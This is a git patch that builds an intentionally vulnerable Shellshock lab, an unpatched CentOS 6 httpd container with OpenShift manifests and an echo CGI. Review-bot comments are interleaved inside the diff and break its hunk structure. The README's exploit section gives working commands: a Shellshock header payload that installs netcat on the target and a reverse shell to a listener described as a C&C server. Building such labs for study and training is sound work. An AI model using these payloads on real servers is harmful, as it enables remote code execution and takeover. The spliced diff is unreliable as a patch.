From 0a2893663f67e9eafe7e1f7eb05eae0522a0f670 Mon Sep 17 00:00:00 2001
From: Nicolas MASSE
Date: Fri, 30 Apr 2021 18:44:46 +0200
Subject: [PATCH] initial commit

---
 shellshock/Dockerfile | 5 ++
 shellshock/README.md | 83 +++++++++++++++++++
 shellshock/openshift/00-namespace.yaml | 10 +++
 shellshock/openshift/10-deploy.yaml | 32 +++++++
 shellshock/openshift/20-svc.yaml | 17 ++++
 shellshock/openshift/30-route.yaml | 17 ++++
 shellshock/rootfs/entrypoint.sh | 18 ++++
 .../rootfs/etc/yum.repos.d/CentOS-Base.repo | 35 ++++++++
 shellshock/rootfs/var/www/cgi-bin/hello.cgi | 5 ++
 9 files changed, 222 insertions(+)
 create mode 100644 shellshock/Dockerfile
 create mode 100644 shellshock/README.md
 create mode 100644 shellshock/openshift/00-namespace.yaml
 create mode 100644 shellshock/openshift/10-deploy.yaml
 create mode 100644 shellshock/openshift/20-svc.yaml
 create mode 100644 shellshock/openshift/30-route.yaml
 create mode 100755 shellshock/rootfs/entrypoint.sh
 create mode 100644 shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo
 create mode 100755 shellshock/rootfs/var/www/cgi-bin/hello.cgi

diff --git a/shellshock/Dockerfile b/shellshock/Dockerfile
new file mode 100644
index 0000000..cfc2d32
--- /dev/null
+++ b/shellshock/Dockerfile
@@ -0,0 +1,5 @@
+FROM vulnerable-centos:6
+COPY rootfs .
+RUN yum install -y httpd
+EXPOSE 80 443
+ENTRYPOINT ["/entrypoint.sh"]
diff --git a/shellshock/README.md b/shellshock/README.md
new file mode 100644
index 0000000..a86fb19
--- /dev/null
+++ b/shellshock/README.md
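Review bot: `RUN yum install -y httpd` leaves the yum metadata and package cache inside the layer; the install already resolves against the frozen vault repo copied in by the preceding `COPY`, so `RUN yum install -y httpd && yum clean all` keeps the same result with a smaller image. `COPY rootfs .` relies on the implicit `WORKDIR /` to land `entrypoint.sh` at `/entrypoint.sh`; `COPY rootfs /` states that explicitly. `EXPOSE 80 443` advertises 443, but nothing in the hunk installs `mod_ssl`, so 443 is presumably not served and could be dropped from the contract. Because this image is deliberately unpatched and runs httpd as root, a label such as `LABEL org.opencontainers.image.description="Intentionally vulnerable Shellshock demo - lab use only"` lets registry scanners and admission policies recognise it rather than relying on the tag name.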
@@ -0,0 +1,83 @@
+# Shellshock vulnerable image
+
+## Build
+
+Old CentOS images are here: https://vault.centos.org/
+
+Install it in a virtual machine.
+
+```sh
+sudo virt-install --name centos6 --os-variant centos6.5 --memory 2048 --vcpus 2 --disk size=10,alias.name=centos6 --hvm --network network=default --cdrom /var/lib/libvirt/images/CentOS-6.5-x86_64-minimal.iso
+```
+
+Mount the qcow2 image as explained [here](https://gist.github.com/shamil/62935d9b456a6f9877b5).
+
+```sh
+sudo qemu-nbd --connect=/dev/nbd0 /var/lib/libvirt/images/disk.qcow2
+sudo mount /dev/mapper/VolGroup-lv_root /mnt/
+sudo tar -cvf /tmp/centos6.tar . -C /mnt
+sudo umount /mnt
+sudo qemu-nbd --disconnect /dev/nbd0
+```
+
+Create the container image.
+
+```sh
+sudo podman import /tmp/centos6.tar vulnerable-centos:6
+sudo buildah bud -t vulnerable-httpd:centos-6 .
+```
+
+Push the image to the registry of your choice.
+
+```sh
+sudo podman tag localhost/vulnerable-httpd:centos-6 registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
+sudo podman push registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
+```
+
+## Usage
+
+```sh
+sudo podman run -d --rm --name vulnerable-httpd vulnerable-httpd:centos-6
+POD_IP=$(sudo podman inspect --format "{{.NetworkSettings.IPAddress}}" vulnerable-httpd)
+```
+
+```
+sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi -H "X-Name: Nicolas"
+Hello, Nicolas!
+sh-4.1# curl http://$POD_IP/cgi-bin/hello.cgi
+Hello, World!
+```
+
+## Deployment
+
+```sh
+oc apply -f openshift/
+```
+
+## Exploit
+
+Find the URL of the vulnerable CGI-BIN.
+
+```sh
+export TARGET="https://$(oc get route frontend -n vulnerable-httpd -o jsonpath="{.spec.host}")/cgi-bin/hello.cgi"
+```
+
+Start a C&C server.
+
+```sh
+sudo firewall-cmd --add-port 6666/tcp
+nc -l -p 6666
+```
+
+Set the IP address of the C&C server.
+
+```sh
+export SERVER_IP=192.168.6.2
+```
+
+Exploit the target.
+
+```sh
+curl "$TARGET" -H "X-Name: () { :; }; /usr/bin/yum install -y nc"
+curl "$TARGET" -H "X-Name: () { :; }; /bin/bash -i >& /dev/tcp/$SERVER_IP/6666 0>&1"
+```
diff --git a/shellshock/openshift/00-namespace.yaml b/shellshock/openshift/00-namespace.yaml
new file mode 100644
index 0000000..1637295
--- /dev/null
+++ b/shellshock/openshift/00-namespace.yaml
@@ -0,0 +1,10 @@
+apiVersion: v1
+kind: Namespace
+metadata:
+  annotations:
+    openshift.io/description: ""
+    openshift.io/display-name: ""
+  name: vulnerable-httpd
+spec:
+  finalizers:
+  - kubernetes
diff --git a/shellshock/openshift/10-deploy.yaml b/shellshock/openshift/10-deploy.yaml
new file mode 100644
index 0000000..60c852d
--- /dev/null
+++ b/shellshock/openshift/10-deploy.yaml
@@ -0,0 +1,32 @@
+apiVersion: apps/v1
+kind: Deployment
+metadata:
+  labels:
+    app: frontend
+    app.kubernetes.io/component: frontend
+    app.kubernetes.io/instance: frontend
+  name: frontend
+  namespace: vulnerable-httpd
+spec:
+  replicas: 1
+  selector:
+    matchLabels:
+      deployment: frontend
+  template:
+    metadata:
+      creationTimestamp: null
+      labels:
+        deployment: frontend
+    spec:
+      containers:
+      - image: registry.itix.xyz/vulnerable/vulnerable-httpd:centos-6
+        imagePullPolicy: IfNotPresent
+        name: frontend
+        resources: {}
+        terminationMessagePath: /dev/termination-log
+        terminationMessagePolicy: File
+      dnsPolicy: ClusterFirst
+      restartPolicy: Always
+      schedulerName: default-scheduler
+      securityContext: {}
+      terminationGracePeriodSeconds: 30
diff --git a/shellshock/openshift/20-svc.yaml b/shellshock/openshift/20-svc.yaml
new file mode 100644
index 0000000..e1d595c
--- /dev/null
+++ b/shellshock/openshift/20-svc.yaml
@@ -0,0 +1,17 @@
+apiVersion: v1
+kind: Service
+metadata:
+  labels:
+    app: frontend
+  name: frontend
+  namespace: vulnerable-httpd
+spec:
+  ports:
+  - name: http
+    port: 80
+    protocol: TCP
+    targetPort: 80
+  selector:
+    deployment: frontend
+  sessionAffinity: None
+  type: ClusterIP
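Review bot: Both `openshift.io/description` and `openshift.io/display-name` are set to empty strings, which throws away the one place a cluster admin sees what this namespace is for. Since the workload it will hold is an intentionally unpatched httpd, something like `openshift.io/description: "Intentionally vulnerable Shellshock demo - lab use only"` makes that visible in the console and in audits. The `finalizers: [kubernetes]` entry under `spec` is what the API server populates on its own, so it can be left out of the manifest.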
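Review bot: `resources: {}` on the `frontend` container sets no CPU or memory limits, so a pod that gets compromised, which is the expected outcome for this workload, can consume as much of the node as it likes; `resources: {limits: {cpu: "500m", memory: "256Mi"}}` (example values) bounds the blast radius. The container also declares no `ports:` entry even though the Service targets port 80, so `ports: [{containerPort: 80, name: http}]` would document the contract and let the Service reference it by name. The image is pulled by a mutable tag with `imagePullPolicy: IfNotPresent`, so a node holding an older cached copy keeps running it; pinning with `@sha256:<digest>` or using `Always` avoids that drift. `securityContext: {}` leaves the pod at the runtime defaults; httpd on port 80 presumably needs root here, and a short comment saying so would stop a later reader from adding `runAsNonRoot` and breaking the demo.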
diff --git a/shellshock/openshift/30-route.yaml b/shellshock/openshift/30-route.yaml
new file mode 100644
index 0000000..c648e9e
--- /dev/null
+++ b/shellshock/openshift/30-route.yaml
@@ -0,0 +1,17 @@
+apiVersion: route.openshift.io/v1
+kind: Route
+metadata:
+  labels:
+    app: frontend
+  name: frontend
+  namespace: vulnerable-httpd
+spec:
+  port:
+    targetPort: http
+  tls:
+    termination: edge
+  to:
+    kind: Service
+    name: frontend
+    weight: 100
+  wildcardPolicy: None
diff --git a/shellshock/rootfs/entrypoint.sh b/shellshock/rootfs/entrypoint.sh
new file mode 100755
index 0000000..98cc91a
--- /dev/null
+++ b/shellshock/rootfs/entrypoint.sh
@@ -0,0 +1,18 @@
+#!/bin/sh
+
+# Stop the scrip on any error encountered
+set -Eeuo pipefail
+
+# Start a test instance of apache
+/usr/sbin/apachectl -k start
+sleep 2
+
+# Run a test query
+curl -s http://localhost/cgi-bin/hello.cgi -H "X-Name: OpenShift"
+
+# Stop apache
+/usr/sbin/apachectl -k stop
+sleep 2
+
+# Run the real apache
+exec /usr/sbin/httpd -X
diff --git a/shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo b/shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo
new file mode 100644
index 0000000..f4bfa19
--- /dev/null
+++ b/shellshock/rootfs/etc/yum.repos.d/CentOS-Base.repo
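Review bot: The Route publishes the intentionally vulnerable CGI on a cluster-ingress hostname, and nothing in the manifest says so; a leading comment such as `# Exposes the intentionally vulnerable httpd demo outside the cluster - apply only on an isolated lab cluster` belongs in a file that is applied as a unit with the rest of `openshift/`. `tls: termination: edge` is set but `insecureEdgeTerminationPolicy` is not, so handling of plain-HTTP requests is left to the router's default; stating `insecureEdgeTerminationPolicy: Redirect` (or `None`) makes the intended behaviour explicit.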
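Review bot: The script declares `#!/bin/sh` but `set -Eeuo pipefail` relies on the bash-only `-E` and `pipefail` options; on this image `/bin/sh` is presumably bash, but `#!/bin/bash` states the dependency instead of assuming it (the comment on the line above also misspells `scrip`). The start-up check then waits a fixed `sleep 2` before the `curl`, and because `-e` is in effect a slow httpd start makes the container exit rather than retry; polling with a bound, e.g. `for i in 1 2 3 4 5; do curl -sf http://localhost/cgi-bin/hello.cgi >/dev/null && break; sleep 1; done`, is more robust. `curl` itself is assumed to come from the imported VM rootfs, since the Dockerfile installs only `httpd`; worth a comment. Finally `exec /usr/sbin/httpd -X` runs httpd in single-process debug mode, which suits a demo but deserves saying in the `# Run the real apache` comment so it is not copied into a real deployment.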
@@ -0,0 +1,35 @@
+[base]
+name=CentOS-$releasever - Base
+baseurl=https://vault.centos.org/6.5/os/$basearch/
+gpgcheck=1
+gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
+
+#released updates
+[updates]
+name=CentOS-$releasever - Updates
+baseurl=http://vault.centos.org/6.5/updates/$basearch/
+gpgcheck=1
+gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
+
+#additional packages that may be useful
+[extras]
+name=CentOS-$releasever - Extras
+baseurl=http://vault.centos.org/6.5/extras/$basearch/
+gpgcheck=1
+gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
+
+#additional packages that extend functionality of existing packages
+[centosplus]
+name=CentOS-$releasever - Plus
+baseurl=http://vault.centos.org/6.5/centosplus/$basearch/
+gpgcheck=1
+enabled=0
+gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
+
+#contrib - packages by Centos Users
+[contrib]
+name=CentOS-$releasever - Contrib
+baseurl=http://vault.centos.org/6.5/contrib/$basearch/
+gpgcheck=1
+enabled=0
+gpgkey=file:///etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-6
\ No newline at end of file
diff --git a/shellshock/rootfs/var/www/cgi-bin/hello.cgi b/shellshock/rootfs/var/www/cgi-bin/hello.cgi
new file mode 100755
index 0000000..d69d336
--- /dev/null
+++ b/shellshock/rootfs/var/www/cgi-bin/hello.cgi
@@ -0,0 +1,5 @@
+#!/bin/sh
+
+echo "Content-Type: text/plain"
+echo
+echo "Hello, ${HTTP_X_NAME:-World}!"
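Review bot: `[base]` fetches over `https://vault.centos.org` while `[updates]`, `[extras]`, `[centosplus]` and `[contrib]` use plain `http://`; `gpgcheck=1` verifies package signatures, but repository metadata is not signed here (no `repo_gpgcheck`), so the plain-http sections can be fed stale or altered metadata on the path. Using `https://` in all five `baseurl` lines is a one-character change per section and makes the file consistent. The file is also committed without a trailing newline (the `\ No newline at end of file` marker), which yum tolerates but which makes every later diff noisier.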
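Review bot: The script carries no comment saying what it is for, and its behaviour is the whole point of the repository: the `X-Name` request header reaches it as `HTTP_X_NAME` in the environment of the `/bin/sh` that this image deliberately leaves unpatched. A header comment such as `# Demo CGI: echoes the X-Name request header (HTTP_X_NAME). Relies on the image's unpatched /bin/sh; do not "fix" by switching shells.` keeps a later maintainer from quietly neutralising the demo. Emitting `Content-Type: text/plain` is the right choice given that the header value is reflected verbatim into the response.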